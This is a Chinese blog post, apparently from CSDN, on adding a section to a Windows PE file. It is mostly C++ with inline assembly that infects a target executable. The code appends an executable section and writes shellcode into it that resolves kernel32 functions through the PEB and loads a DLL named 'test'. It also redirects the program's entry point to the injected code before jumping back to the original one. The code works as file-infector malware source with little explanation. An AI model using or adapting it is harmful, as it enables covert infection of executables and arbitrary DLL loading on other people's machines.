PE文件的修改以及增加节区

最新推荐文章于 2022-05-26 20:23:16 发布
最新推荐文章于 2022-05-26 20:23:16 发布
阅读量2.3k 收藏 5
点赞数
分类专栏: 技术文章

修改入口函数地址。这个是最省事的办法,在原PE文件中新增加一个节,计算新节的RVA,然后修改入口代码,使其指向新增加的节。当然,如果.text节空隙足够大的话,不用添加新节也可以。

BOOL ChangeOEP(CString strFilePath)   
{   
    FILE*                   rwFile;                     // 被感染的文件   
    IMAGE_SECTION_HEADER    NewSection;                 // 定义要添加的区块   
    IMAGE_NT_HEADERS        NThea;                      //    
    DWORD                   pNT;                        // pNT中存放IMAGE_NT_HEADERS结构的地址   
    int                     nOldSectionNo;   
    int                     OEP;   
       
    if((rwFile=fopen(strFilePath,"rb"))==NULL){         // 打开文件失败则返回   
        return FALSE;   
    }   
       
    if(!CheckPE(rwFile)){                               // 如果不是PE文件则返回   
        return FALSE;   
    }   
       
    fseek(rwFile,0x3c,0);   
    fread(&pNT,sizeof(DWORD),1,rwFile);   
    fseek(rwFile,pNT,0);   
    fread(&NThea,sizeof(IMAGE_NT_HEADERS),1,rwFile);    // 读取原文件的IMAGE_NT_HEADERS结构   
    nOldSectionNo=NThea.FileHeader.NumberOfSections;    // 保存原文件区块数量   
    OEP=NThea.OptionalHeader.AddressOfEntryPoint;       // 保存原文件区块OEP   
    IMAGE_SECTION_HEADER    SEChea;                     // 定义一个区块存放原文件最后一个区块的信息   
    int SECTION_ALIG=NThea.OptionalHeader.SectionAlignment;   
    int FILE_ALIG=NThea.OptionalHeader.FileAlignment;   // 保存文件对齐值与区块对齐值   
    memset(&NewSection, 0, sizeof(IMAGE_SECTION_HEADER));   
    fseek(rwFile,pNT+248,0);                            // 读原文件最后一个区块的信息   
    for(int i=0;i<nOldSectionNo;i++)   
        fread(&SEChea,sizeof(IMAGE_SECTION_HEADER),1,rwFile);   
       
    FILE    *newfile = fopen(strFilePath,"rb+");   
    if(newfile==NULL){   
        return FALSE;   
    }   
    fseek(newfile,SEChea.PointerToRawData+SEChea.SizeOfRawData,SEEK_SET);   
    goto shellend;   
    __asm   
    {       
shell:  PUSHAD   
            MOV  EAX,DWORD PTR FS:[30H]     ;FS:[30H]指向PEB   
            MOV  EAX,DWORD PTR [EAX+0CH]    ;获取PEB_LDR_DATA结构的指针   
            MOV  EAX,DWORD PTR [EAX+1CH]    ;获取LDR_MODULE链表表首结点的inInitializeOrderModuleList成员的指针   
            MOV  EAX,DWORD PTR [EAX]        ;LDR_MODULE链表第二个结点的inInitializeOrderModuleList成员的指针   
            MOV  EAX,DWORD PTR [EAX+08H]    ;inInitializeOrderModuleList偏移8h便得到Kernel32.dll的模块基址   
            MOV  EBP,EAX                    ;将Kernel32.dll模块基址地址放至kernel中   
            MOV  EAX,DWORD PTR [EAX+3CH]    ;指向IMAGE_NT_HEADERS   
            MOV  EAX,DWORD PTR [EBP+EAX+120];指向导出表   
            MOV  ECX,[EBP+EAX+24]           ;取导出表中导出函数名字的数目   
            MOV  EBX,[EBP+EAX+32]           ;取导出表中名字表的地址   
            ADD  EBX,EBP   
            PUSH WORD  PTR 0X00             ;构造GetProcAddress字符串   
            PUSH DWORD PTR 0X73736572   
            PUSH DWORD PTR 0X64644163   
            PUSH DWORD PTR 0X6F725074   
            PUSH WORD PTR 0X6547   
            MOV  EDX,ESP   
            PUSH ECX   
               
F1:     
        MOV  EDI,EDX   
            POP  ECX   
            DEC  ECX   
            TEST  ECX,ECX   
            JZ  EXIT   
            MOV  ESI,[EBX+ECX*4]       
            ADD  ESI,EBP   
            PUSH  ECX   
            MOV  ECX,15   
            REPZ  CMPSB   
            TEST  ECX,ECX   
            JNZ  F1   
               
            POP  ECX   
            MOV  ESI,[EBP+EAX+36]           ;取得导出表中序号表的地址   
            ADD  ESI,EBP   
            MOVZX  ESI,WORD PTR[ESI+ECX*2]  ;取得进入函数地址表的序号   
            MOV  EDI,[EBP+EAX+28]           ;取得函数地址表的地址   
            ADD  EDI,EBP   
            MOV  EDI,[EDI+ESI*4]            ;取得GetProcAddress函数的地址   
            ADD  EDI,EBP         
               
            PUSH WORD PTR 0X00              ;构造LoadLibraryA字符串   
            PUSH DWORD PTR 0X41797261   
            PUSH DWORD PTR 0X7262694C   
            PUSH DWORD PTR 0X64616F4C   
            PUSH ESP   
            PUSH  EBP   
            CALL  EDI                       ;调用GetProcAddress取得LoadLibraryA函数的地址   
            PUSH  WORD PTR 0X00             ;添加参数“test”符串   
            PUSH  DWORD PTR 0X74736574   
            PUSH  ESP   
            CALL  EAX   
EXIT:  ADD ESP,36                           ;平衡堆栈   
       POPAD   
    }   
shellend:   
    char*   pShell;   
    int     nShellLen;   
    BYTE    jmp = 0xE9;   
    __asm   
    {   
        LEA EAX,shell   
        MOV pShell,EAX;   
        LEA EBX,shellend   
        SUB EBX,EAX   
        MOV nShellLen,EBX   
    }   
           
    // 写入SHELLCODE,   
    for(i=0;i<nShellLen;i++)   
        fputc(pShell[i],newfile);   
           
    // SHELLCODE之后是跳转到原OEP的指令   
    NewSection.VirtualAddress=SEChea.VirtualAddress+Align(SEChea.Misc.VirtualSize,SECTION_ALIG);   
    OEP=OEP-(NewSection.VirtualAddress+nShellLen)-5;   
    fwrite(&jmp, sizeof(jmp), 1, newfile);   
    fwrite(&OEP, sizeof(OEP), 1, newfile);   
           
    // 将最后增加的数据用0填充至按文件中对齐的大小   
    for(i=0;i<Align(nShellLen,FILE_ALIG)-nShellLen-5;i++)   
        fputc('\0',newfile);   
           
    // 新区块中的数据   
    strcpy((char*)NewSection.Name,".NYsky");   
    NewSection.PointerToRawData=SEChea.PointerToRawData+SEChea.SizeOfRawData;   
    NewSection.Misc.VirtualSize=nShellLen;   
    NewSection.SizeOfRawData=Align(nShellLen,FILE_ALIG);   
    NewSection.Characteristics=0xE0000020;   
           
    // 新区块可读可写可执行、写入新的块表   
    fseek(newfile,pNT+248+sizeof(IMAGE_SECTION_HEADER)*nOldSectionNo,0);   
    fwrite(&NewSection,sizeof(IMAGE_SECTION_HEADER),1,newfile);   
       
    int nNewImageSize=NThea.OptionalHeader.SizeOfImage+Align(nShellLen,SECTION_ALIG);   
    int nNewSizeofCode=NThea.OptionalHeader.SizeOfCode+Align(nShellLen,FILE_ALIG);   
    fseek(newfile,pNT,0);   
    NThea.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].VirtualAddress=0;   
    NThea.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].Size=0;   
    NThea.OptionalHeader.SizeOfCode=nNewSizeofCode;   
    NThea.OptionalHeader.SizeOfImage=nNewImageSize;   
    NThea.FileHeader.NumberOfSections=nOldSectionNo+1;   
    NThea.OptionalHeader.AddressOfEntryPoint=NewSection.VirtualAddress;   
           
    // 写入更新后的PE头结构   
    fwrite(&NThea,sizeof(IMAGE_NT_HEADERS),1,newfile);   
    fclose(newfile);   
    fclose(rwFile);   
    return TRUE;   
}


5t4rk
关注
专栏目录
vc编写自己的壳之一:对pe文件OEP的修改
rageliu的专栏
03-16 3042
最近学习pe格式和写壳,最终目标是写出自己的壳,并有一定的anti能力.调试了下修改pe文件的oep,然后在新的入口点什么都没做,只是jmp回到原始入口点,程序继续执行.测试通过. 准备明天在自己入口点的地方添加一个MessageBox代码.很多是网上朋友的代码,借用下不好意思,如有版权等问题请联系偶,偶会尽快处理,谢谢.void CPeSecDlg::Go(){ HANDLE hFi
手动修改PE文件修改节表
当我在写代码的时候我在写什么
11-06 4005
目前想到的关于修改节表就是新增节和节表移位,其它的改节的读写什么的就改个Flag而已就不说了。以后有新的想法再添加。 1.新增节 现在很多解析PE格式的软件都有添加节的功能,具体代码怎么写,下面就说一下。PE格式结构排布顺序是这样:Dos头->DosStub->NT头->节表->Padding->节内容。 在节表之后因为文件对齐的关系,可能会多出一段00,这一段00就可以用来
VC读取PE文件的OEP(程序入口)
weixin_33797791的博客
06-12 828
为什么80%的码农都做不了架构师?>>> ...
获取PE文件入口点
::CreateFile
09-26 4736
<br />大家好,最近在网上看了一下PE文件结构的解释的文章,里面有一个修改PE文件的示例,是向PE文件插入一个消息框,以让目标PE文件执行时首先显示插入的消息框,其中有一段代码如下:<br /><br />//计算新的程序入口地址<br />DWORD dwNewEntryAddress = dwEntryWrite + dwCodeOffset;<br /><br />这段代码我看不明白,为什么要在最后加上代码偏移值呢?被写入的代码是写在dwEntryWrite地址处,把入口点改在这个地方不就可以了么
手动增加pe节并修改oep
wangbabadan的专栏
03-26 918
一直想学学怎么动动pe文件,学习了几篇文章尤其是寒晨的文章后,自己动手也尝试了一下加节和修改oep,写出来供和我一样菜的一起进步。 一、       增加pe节需要的操作 1.    确定内存中的节的对齐粒度和文件中的节的对齐粒度,分别是pe+0038h 和3ch   也就是说 内存和文件的对齐粒度都是1000h. 2.    在文件末尾增加数据。 因为文件对齐的粒度是1000
PE文件节区添加并弹出简单的对话框
05-26
在Windows系统中,当我们谈论“添加节区”时,实际上是在修改PE文件头的节表,增加新的条目来指示操作系统加载新的内存区域。 为了自动添加节区,你需要熟悉PE文件的内部结构,特别是IMAGE_NT_HEADERS和IMAGE_...
DOS.rar_PE修改_pe_pe文件修改
09-14
标题"DOS.rar_PE修改_pe_pe文件修改"涉及的是在DOS环境下对PE(Portable Executable)文件进行修改的技术。PE文件格式是Windows操作系统中的可执行文件格式,它包含了程序运行所需的代码、数据和元数据。在本文中,...
关于PE可执行文件修改.rar_PE修改_pe_pe文件修改
09-23
本主题将深入探讨PE文件的结构以及如何对其进行修改。 首先,我们要了解PE文件的基本结构。一个PE文件由多个部分组成,包括DOS头、PE头(NT头)、节表、节区(Section)等。DOS头是一个遗留的结构,使得PE文件能在...
windows平台PE文件自定义节区添加
最新发布
08-17
- 更新PE文件头部中的`NumberOfSections`字段,增加节区数量。 - 将新的节区表信息写回PE文件。 - 根据实际情况,还需要更新节区的实际数据,并将新节区的虚拟地址和实际大小返回给调用者。 通过以上步骤和技术...
修改pe程序入口点
qq_44657899的博客
05-26 1622
固定基址-便于调试 修改入口点 程序使用x64dbg打开,可以看到程序基址为140000000 程序的入口点为11023,那么在内存中,程序入口点=基址+偏移量=140000000+11023=140011023 ctrl+G定位到140011023,然后找一个空白处,这里选择1400113B3,修改汇编代码为jmp 0x140011023 右键→补丁→修补文件,保存文件为project2.exe,然后将程序入口点修改为00113B3 现在运行project2.exe,可以发现入口点已经到了140.
PE型感染病毒 —— 增加节点修改PE入口 (3)
~ 飞 扬 的 天 空 ~
02-27 854
这套源码并非原创,而是参考llydd大佬的文章,通过在PE文件增加新节点,并在新节中增入SHELL CODE来加载指定DLL从而实现XX.... 原文地址:http://bbs.pediy.com/showthread.php?t=36497   所以可以根据遍历PE文件节点来判断是还被感染过,下面是自己根据自己的工程需要,适当修改了其中一小部分代码: 1、判断PE文件
PE文件实战教程之手动实现新增节
weixin_43742894的博客
04-01 1445
前面我们说过在空白节添加代码,想要更多空间的话,可以扩大节,但是在最后一个节进行扩大的话,还需要修改原来节的属性,比较麻烦,所以不如直接新增一个节! 并且我们通过手动新增节,可以直观地看到非常多的细节,帮助我们理解原理! 手动实现新增节什么是新增一个节?了解一下节表新增节表的步骤1.判断是否有足够的空间增加一个新节.2.节表新增一个成员,在原最后一个成员后面添加3.修改节的数量4 修改sizeOfImage的大小5.再原有数据的最后,新增一个节的数据(内存对齐的整数倍)6 修正新增节表的属性节.Virt.
获取PE文件的OEP值 (源码)
驱动开发
06-05 1317
两种方法读取PE文件的OEP值:一是 直接读取文件,二是 通过内存映射。#include "stdafx.h"#include //-------------------------------//read the file of .exe  get the OEP (Original Entry Point)//-------------------------------BOOL Re
修改OEP到PE非代码段也可以运行?
陈刚编程心得与知识集
03-10 783
刚才测试了一下lordpe找了一个非代码区,该区域没有执行属性,然后我把pe里oep的地址改向这个非代码区的某位置,直接执行虽然出问题,但是用od看到是从非代码区运行了。没有执行权限,为什么还能运行呢?
Dll注入:修改PE文件 IAT注入
aijuzhou1959的博客
08-26 195
PE原理就不阐述了, 这个注入是PE感染的一种,通过添加一个新节注入,会改变PE文件的大小,将原有的导入表复制到新节中,并添加自己的导入表描述符,最后将数据目录项中指向的导入表的入口指向新节。 步骤: 1.添加一个新节;映射PE文件,判断是否可以加一个新节,找到节的尾部,矫正偏移,对齐RVA 填充新节PIMAGE_SECTION_HEADER,修改IMAGE_NT_HEADERS,...
C/C++ 反调试与绕过手法
CSDN
09-13 5501
反调试技术,恶意代码会用它识别自身是否被调试,或者让调试器失效,给反病毒工程师们制造麻烦,拉长提取特征码的时间线,本章将具体总结常见的反调试基础的实现原理以及如何过掉这些反调试手段,从而让我们能够继续分析恶意代码。
【exe加壳:修改可执行文件PE头,增加一节,修改程序入口地址为该节】
Laughing
11-28 3726
一:PE增加节 使用工具为:LordPE、010Editor、CFF、OD List item 先用 010Editor 查看节表部分是否足够长度加入新的节表目录 从图中看出,节表后面还有空余地方,可存放新增目录项 用 LordPE 查看PE头部信息,增加一节,在 setions 中修改新增节表的属性 原始PE头信息:可得原始节表中有9项 修改节表项数为10节 然后点击Setions按钮,在里面修改新增节的相关属性(这里的相关原理有兴趣可自行了解) 进去后可看见最后一节表项名字和其他相关数据
简单的PE文件壳设计与验证
weixin_43908728的博客
11-07 663
简单的PE文件壳设计与验证 date: 2020 /11/6 Mission: 实现简单的跳转壳,在PE文件中添加新节,在新节其中加入跳转至原入口的指令,实现对原程序的启动。 实现PE文件加密壳,对原程序代码节内容异或运算,在原程序中加入新节实现对原代码节内容解密并启动运行。 Misson Source:CQU Source Code 测试使用的asm代码 .386 .model flat,stdcall option casemap:none include windows.inc include u
PE文件:(1)基础知识
weixin_43972499的博客
04-06 748
基础知识基本概念PE文件结构Dos头NT头(1)PE标志(2)文件头(3)可选头区段表总结 基本概念   PE文件的全称是"Portable Executable File Format",也就是可移植的执行体,目前是Windows平台上的主流可执行文件格式。   PE文件使用的是一个平面地址空间,所有的代码和数据都合并在了一起,组成了一个完整的文件结构。文件内容被分成了不同的部分区段,区段中包含文件基本信息、数据、代码,各个区段按页大小对齐,每个区段都有自己的属性,如是否可读、可写和可执行。 PE文件结构
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值